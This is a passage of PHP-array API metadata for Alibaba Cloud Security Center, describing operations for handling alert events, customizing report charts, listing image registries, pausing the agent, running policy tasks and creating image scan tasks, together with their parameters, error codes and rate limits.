['description' => 'The time consumed for the request. Unit: seconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'OperationTaskNotExists', 'errorMessage' => 'The specified operation task does not exist', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\",\\n \\"HttpStatusCode\\": 200,\\n \\"TimeCost\\": 1\\n}","type":"json"}]', 'title' => 'OperationCancelIgnoreSuspEvent', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperationCancelIgnoreSuspEvent'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:OperationCancelIgnoreSuspEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'OperationCustomizeReportChart' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92420', 'abilityTreeNodes' => ['FEATUREsasAT4UY0'], ], 'parameters' => [ [ 'name' => 'ReportId', 'in' => 'query', 'schema' => ['description' => 'The report ID.'."\n" .'>Call [DescribeCustomizeReportList](~~DescribeCustomizeReportList~~) to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], [ 'name' => 'ChartIds', 'in' => 'query', 'schema' => ['description' => 'The IDs of report chart configurations. Separate multiple IDs with commas (,).'."\n" .'>Call [DescribeChartList](~~DescribeChartList~~) to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'CID_VUL_SUMMARY,CID_VUL_TREND,CID_VUL_OPERATION_TREND,CID_BASELINE_CHECK_SUMMARY,CID_BASELINE_CHECK_TREND,CID_BASELINE_CHECK_OPERATION_TREND', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '432B2D4E-C8D3-52E4-9F68-35E0C05F****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify security report statistical charts', 'summary' => 'Modifies the statistical charts of a security report.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperationCustomizeReportChart'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:OperationCustomizeReportChart', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"432B2D4E-C8D3-52E4-9F68-35E0C05F****\\"\\n}","type":"json"}]', ], 'OperationSuspEvents' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'SuspiciousEventIds', 'in' => 'query', 'schema' => ['description' => 'The list of alert event IDs.'."\n" ."\n" .'> You can call [DescribeSuspEvents](~~DescribeSuspEvents~~) to obtain alert event IDs from the SecurityEventIds response parameter.', 'type' => 'string', 'required' => true, 'example' => '290852', 'title' => ''], ], [ 'name' => 'Operation', 'in' => 'query', 'schema' => ['description' => 'The operation to perform on the alert. Valid values:'."\n" ."\n" .'- **deal**: handles the alert (quarantine).'."\n" .'- **ignore**: ignores the alert.'."\n" .'- **mark\\_mis_info**: marks the alert as a false positive (adds it to the whitelist).'."\n" .'- **rm\\_mark\\_mis_info**: unmarks the alert as a false positive (removes it from the whitelist).'."\n" .'- **offline_handled**: marks the alert as handled.', 'type' => 'string', 'required' => true, 'example' => 'deal', 'title' => ''], ], [ 'name' => 'SubOperation', 'in' => 'query', 'schema' => ['description' => 'The sub-operation type to perform when quarantining the alert event. Valid values:'."\n" ."\n" .'- **killAndQuaraFileByPidAndMd5andPath**: terminates the process by PID and quarantines the source file of the process.'."\n" .'- **quaraFileByMd5andPath**: quarantines the source file of the process.'."\n" .'- **killAndQuaraFileByMd5andPath**: terminates the process and quarantines the source file of the process.', 'type' => 'string', 'required' => false, 'example' => 'killAndQuaraFileByPidAndMd5andPath', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The request source identifier.'."\n" ."\n" .'Set this parameter to **sas**, which indicates a request from the Security Center client.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'WarnType', 'in' => 'query', 'schema' => ['description' => 'The type of the exception event to handle. Valid values:'."\n" ."\n" .'- **alarm**: alert.'."\n" .'- **Empty**: exception.', 'type' => 'string', 'required' => false, 'example' => 'alarm', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the alert events are handled. Valid values:'."\n" ."\n" .'- **true**: Handled.'."\n" .'- **false**: Not handled.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'AccessCode' => ['description' => 'Indicates whether you have the access permission. Valid values:'."\n" ."\n" .'- **pass**: You have the permission.'."\n" .'- **no_permission**: You do not have the permission.', 'type' => 'string', 'example' => 'pass', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ClientOffline', 'errorMessage' => 'Client offline', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Handle alert events in batches', 'summary' => 'Handles alert events in batches.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperationSuspEvents'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:OperationSuspEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"AccessCode\\": \\"pass\\"\\n}","type":"json"}]', ], 'PageImageRegistry' => [ 'summary' => 'Queries a list of image repositories.', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'RegistryTypeInList', 'in' => 'formData', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of image repository types to include.', 'type' => 'array', 'items' => ['description' => 'The image repository type. Valid values:'."\n" ."\n" .'- **acr**: ACR'."\n" .'- **harbor**: Harbor'."\n" .'- **quay**: Quay'."\n" .'- **CI/CD**: Jenkins.', 'type' => 'string', 'required' => false, 'example' => 'acr', 'title' => ''], 'required' => false, 'maxItems' => 10, 'example' => '', ], ], [ 'name' => 'RegistryTypeNotInList', 'in' => 'formData', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of image repository types to exclude.', 'type' => 'array', 'items' => ['description' => 'The image repository type. Valid values:'."\n" ."\n" .'- **acr**: ACR'."\n" .'- **harbor**: Harbor'."\n" .'- **quay**: Quay'."\n" .'- **CI/CD**: Jenkins.', 'type' => 'string', 'required' => false, 'example' => 'quay', 'title' => ''], 'required' => false, 'maxItems' => 10, 'example' => '', ], ], [ 'name' => 'RegistryNameLike', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The image repository name. Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => 'asa'], ], [ 'name' => 'CurrentPage', 'in' => 'formData', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'formData', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '140.207.XXX.XXX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The image repository list data.', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The image repository list data.', 'type' => 'array', 'items' => [ 'description' => 'The image repository list data.', 'type' => 'object', 'properties' => [ 'Id' => ['title' => '', 'description' => 'The unique ID of the image repository.', 'type' => 'integer', 'format' => 'int64', 'example' => '1078312'], 'GmtCreate' => ['title' => '', 'description' => 'The creation time, in the yyyy-MM-dd HH:mm:ss format.', 'type' => 'string', 'example' => '2022-08-30 10:23:30'], 'GmtModified' => ['title' => '', 'description' => 'The update time, in the yyyy-MM-dd HH:mm:ss format.', 'type' => 'string', 'example' => '2022-09-30 10:23:30'], 'RegistryName' => ['title' => '', 'description' => 'The alias of the image repository.', 'type' => 'string', 'example' => 'test1'], 'RegistryType' => ['title' => '', 'description' => 'The image repository type. Valid values:'."\n" ."\n" .'- **acr**: ACR'."\n" .'- **harbor**: Harbor'."\n" .'- **quay**: Quay'."\n" .'- **CI/CD**: Jenkins.', 'type' => 'string', 'example' => 'harbor'], 'ProtocolType' => ['title' => '', 'description' => 'The protocol type. Valid values:'."\n" .'- **1**: HTTP'."\n" .'- **2**: HTTPS.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'NetType' => ['title' => '', 'description' => 'The network type. Valid values:'."\n" .'- **1**: public network'."\n" .'- **2**: VPC.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'VpcId' => ['title' => '', 'description' => 'The instance ID of the VPC.', 'type' => 'string', 'example' => 'vpc-5gu8iu68w9b472jbb****'], 'RegistryHostIp' => ['title' => '', 'description' => 'The IP address of the repository.', 'type' => 'string', 'example' => '39.104.XXX.XXX'], 'DomainName' => ['title' => '', 'description' => 'The domain name of the repository.', 'type' => 'string', 'example' => 'sinochem.com'], 'UserName' => ['title' => '', 'description' => 'The username.', 'type' => 'string', 'example' => 'RegistryUser'], 'Password' => ['title' => '', 'description' => 'The password.', 'type' => 'string', 'example' => 'Harbor******'], 'RegionId' => ['title' => '', 'description' => 'The region ID of the repository.', 'type' => 'string', 'example' => 'cn-hangzhou'], 'Token' => ['title' => '', 'description' => 'The authentication token of the user.', 'type' => 'string', 'example' => 'c7b90d29-632f-4e58-88b8-00ad77f6****'], 'WhiteList' => ['title' => '', 'description' => 'The whitelist.', 'type' => 'string', 'example' => '192.168.XXX.XXX'], 'BlackList' => ['title' => '', 'description' => 'The blacklist.', 'type' => 'string', 'example' => '129.211.XXX.XXX'], 'TransPerHour' => ['title' => '', 'description' => 'The number of scan tasks per hour.', 'type' => 'integer', 'format' => 'int32', 'example' => '30'], 'PersistenceDay' => ['title' => '', 'description' => 'The number of days that assets are retained.', 'type' => 'integer', 'format' => 'int32', 'example' => '30'], 'ImageCount' => ['title' => '', 'description' => 'The number of images in the repository.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'JenkinsEnv' => ['description' => 'The Jenkins environment context.', 'type' => 'string', 'example' => 'projectInfo', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information for the paged query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'FDA9E37C-6114-5945-8FF1-E3D4D397****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image repositories by page', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'PageImageRegistry'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:PageImageRegistry', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"Id\\": 1078312,\\n \\"GmtCreate\\": \\"2022-08-30 10:23:30\\",\\n \\"GmtModified\\": \\"2022-09-30 10:23:30\\",\\n \\"RegistryName\\": \\"test1\\",\\n \\"RegistryType\\": \\"harbor\\",\\n \\"ProtocolType\\": 1,\\n \\"NetType\\": 1,\\n \\"VpcId\\": \\"vpc-5gu8iu68w9b472jbb****\\",\\n \\"RegistryHostIp\\": \\"39.104.XXX.XXX\\",\\n \\"DomainName\\": \\"sinochem.com\\",\\n \\"UserName\\": \\"RegistryUser\\",\\n \\"Password\\": \\"Harbor******\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Token\\": \\"c7b90d29-632f-4e58-88b8-00ad77f6****\\",\\n \\"WhiteList\\": \\"192.168.XXX.XXX\\",\\n \\"BlackList\\": \\"129.211.XXX.XXX\\",\\n \\"TransPerHour\\": 30,\\n \\"PersistenceDay\\": 30,\\n \\"ImageCount\\": 1,\\n \\"JenkinsEnv\\": \\"projectInfo\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 20\\n },\\n \\"RequestId\\": \\"FDA9E37C-6114-5945-8FF1-E3D4D397****\\"\\n}","type":"json"}]', ], 'PauseClient' => [ 'summary' => 'Enables or disables the Security Center agent.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92422', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of servers for which you want to enable or disable the Security Center agent.'."\n", 'type' => 'string', 'required' => true, 'example' => 'uuid-1211-sadsd-2131', 'title' => ''], ], [ 'name' => 'Value', 'in' => 'query', 'schema' => ['description' => 'The status of the Security Center agent. Valid values:'."\n" ."\n" .'* **0**: disabled'."\n" .'* **1**: enabled'."\n", 'type' => 'string', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '6673D49C-A9AB-40DD-B4A2-B92306701AE7', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"6673D49C-A9AB-40DD-B4A2-B92306701AE7\\"\\n}","errorExample":""},{"type":"xml","example":"\\r\\n6673D49C-A9AB-40DD-B4A2-B92306701AE7\\r\\n","errorExample":""}]', 'title' => 'PauseClient', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'PauseClient'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:PauseClient', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ProcessSoarStrategyTask' => [ 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '240752', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'StrategyTaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy task.'."\n" .'>Call the [DescribeSoarStrategyTasks](~~DescribeSoarStrategyTasks~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '100', 'title' => ''], ], [ 'name' => 'TaskAction', 'in' => 'query', 'schema' => [ 'description' => 'The action status of the task. Valid values:'."\n" .'- SCHEDULE: scheduling'."\n" .'- PAUSE: pause.', 'type' => 'string', 'required' => true, 'enum' => ['WAITING', 'STARTING', 'RUNNING', 'FINISHED', 'SCHEDULE', 'PAUSE'], 'example' => 'SCHEDULE', 'title' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '79CFF74D-E967-5407-8A78-EE03B925****'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Execute a policy task in the task center', 'summary' => 'Executes a policy task in the task center.', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API call. Other editions do not support this operation.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ProcessSoarStrategyTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ProcessSoarStrategyTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"79CFF74D-E967-5407-8A78-EE03B925****\\"\\n}","type":"json"}]', ], 'PublicCreateImageScanTask' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '119152', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '192.168..XX.XX', 'title' => ''], ], [ 'name' => 'RegistryTypes', 'in' => 'query', 'schema' => ['description' => 'The types of image registries. Separate multiple types with commas (,). Valid values:'."\n" ."\n" .'- **acr**'."\n" .'- **harbor**'."\n" .'- **quay**.', 'type' => 'string', 'required' => false, 'example' => 'acr', 'title' => ''], ], [ 'name' => 'RegionIds', 'in' => 'query', 'schema' => ['description' => 'The region IDs of the images. Separate multiple region IDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'schema' => ['description' => 'The IDs of the Container Registry (ACR) instances. Separate multiple IDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'i-uf6j8vq9l4r5ntht****', 'title' => ''], ], [ 'name' => 'RepoNamespaces', 'in' => 'query', 'schema' => ['description' => 'The namespaces of the image registries. Separate multiple namespaces with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'hanghai-namespace', 'title' => ''], ], [ 'name' => 'RepoIds', 'in' => 'query', 'schema' => ['description' => 'The IDs of the image registries. Separate multiple IDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'crr-vridcl4****', 'title' => ''], ], [ 'name' => 'RepoNames', 'in' => 'query', 'schema' => ['description' => 'The names of the image registries. Separate multiple names with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'centos', 'title' => ''], ], [ 'name' => 'Digests', 'in' => 'query', 'schema' => ['description' => 'The SHA256 digest values of the images. Separate multiple SHA256 values with commas (,).', 'type' => 'string', 'required' => false, 'example' => '6a5e103187b31a94592a47a5858617f7a6c', 'title' => ''], ], [ 'name' => 'Tags', 'in' => 'query', 'schema' => ['description' => 'The tags of the images. Separate multiple tags with commas (,).', 'type' => 'string', 'required' => false, 'example' => '0.2', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F9353221-40F4-5F98-B73C-2803DC804033'], 'Data' => [ 'description' => 'The data returned when the operation is successful.', 'type' => 'object', 'properties' => [ 'TaskId' => ['description' => 'The ID of the scan task.', 'type' => 'string', 'example' => 'a410bb3e68c217a3368bc0238c66886d', 'title' => ''], 'TotalCount' => ['description' => 'The total number of images to scan.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'FinishCount' => ['description' => 'The number of images that have been scanned.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'CollectTime' => ['description' => 'The timestamp when image information was collected, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1644286364150', 'title' => ''], 'ExecTime' => ['description' => 'The timestamp when the scan task started running, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1644286364150', 'title' => ''], 'Status' => ['description' => 'The status of the scan task. Valid values:'."\n" ."\n" .'- **INIT**: Initializing.'."\n" .'- **PRE_ANALYZER**: Pre-analyzing.'."\n" .'- **SUCCESS**: Succeeded.'."\n" .'- **FAIL**: Failed.', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'Progress' => ['description' => 'The progress percentage of the scan task.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Result' => ['description' => 'The execution result of the scan task. Valid values:'."\n" ."\n" .'- **SUCCESS**: The scan task succeeded.'."\n" .'- **TASK\\_NOT\\_SUPPORT_REGION**: The image is in a region that does not support scanning.'."\n" ."\n" .'> For the regions that support image security scanning, see the table of supported regions after the response parameters table in this topic.', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'CanCreate' => ['description' => 'Indicates whether more scan tasks can be created. Valid values:'."\n" ."\n" .'- **true**: More scan tasks can be created.'."\n" .'- **false**: No more scan tasks can be created.'."\n" ."\n" .'> By default, up to 10 scan tasks can exist at the same time. If the number of scan tasks exceeds 10, creating a scan task by calling this operation fails. Wait until an existing scan task is completed before creating a new scan task.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'BeyondQuata', 'errorMessage' => 'Please check the scan quota', 'description' => ''], ['errorCode' => 'TaskNumEmpty', 'errorMessage' => 'Create task quantity is empty.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Create an image scan task', 'summary' => 'Creates an image scan task that is not limited by a single primary task.', 'description' => 'Before calling this operation, call the [PublicPreCheckImageScanTask](~~PublicPreCheckImageScanTask~~) operation to query the number of container images covered by the image scan node and the number of authorizations consumed. This ensures that sufficient authorizations are available for the image scan node and prevents the image scan node from a break due to insufficient authorizations.', 'responseParamsDescription' => '**Regions that support image security scanning**'."\n" ."\n" .'| Region | City | Region ID |'."\n" .'|:---:|:---:|:---:|'."\n" .'|China (Hangzhou)|Hangzhou|cn-hangzhou|'."\n" .'|China (Shanghai)|Shanghai|cn-shanghai|'."\n" .'|China (Shenzhen)|Shenzhen|cn-shenzhen|'."\n" .'|China (Qingdao)|Qingdao|cn-qingdao|'."\n" .'|China (Beijing)|Beijing|cn-beijing|'."\n" .'|China (Zhangjiakou)|Zhangjiakou|cn-zhangjiakou|'."\n" .'|China (Hohhot)|Hohhot|cn-huhehaote|'."\n" .'|China (Hong Kong)|Hong Kong|cn-hongkong|'."\n" .'|Japan (Tokyo)|Tokyo|ap-northeast-1|'."\n" .'|Indonesia (Jakarta)|Jakarta|ap-southeast-5|'."\n" .'|US (Silicon Valley)|Silicon Valley|us-west-1|'."\n" .'|US (Virginia)|Virginia|us-east-1|'."\n" .'|Germany (Frankfurt)|Frankfurt|eu-central-1|'."\n" .'|UK (London)|London|eu-west-1|.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'PublicCreateImageScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:PublicCreateImageScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F9353221-40F4-5F98-B73C-2803DC804033\\",\\n \\"Data\\": {\\n \\"TaskId\\": \\"a410bb3e68c217a3368bc0238c66886d\\",\\n \\"TotalCount\\": 5,\\n \\"FinishCount\\": 5,\\n \\"CollectTime\\": 1644286364150,\\n \\"ExecTime\\": 1644286364150,\\n \\"Status\\": \\"SUCCESS\\",\\n \\"Progress\\": 100,\\n \\"Result\\": \\"SUCCESS\\",\\n \\"CanCreate\\": true\\n }\\n}","type":"json"}]', ], 'PublicPreCheckImageScanTask' => [ 'summary' => 'Queries the number of images to scan in an image scan task and the quota for container image scan to be consumed by the task.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '119144', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' 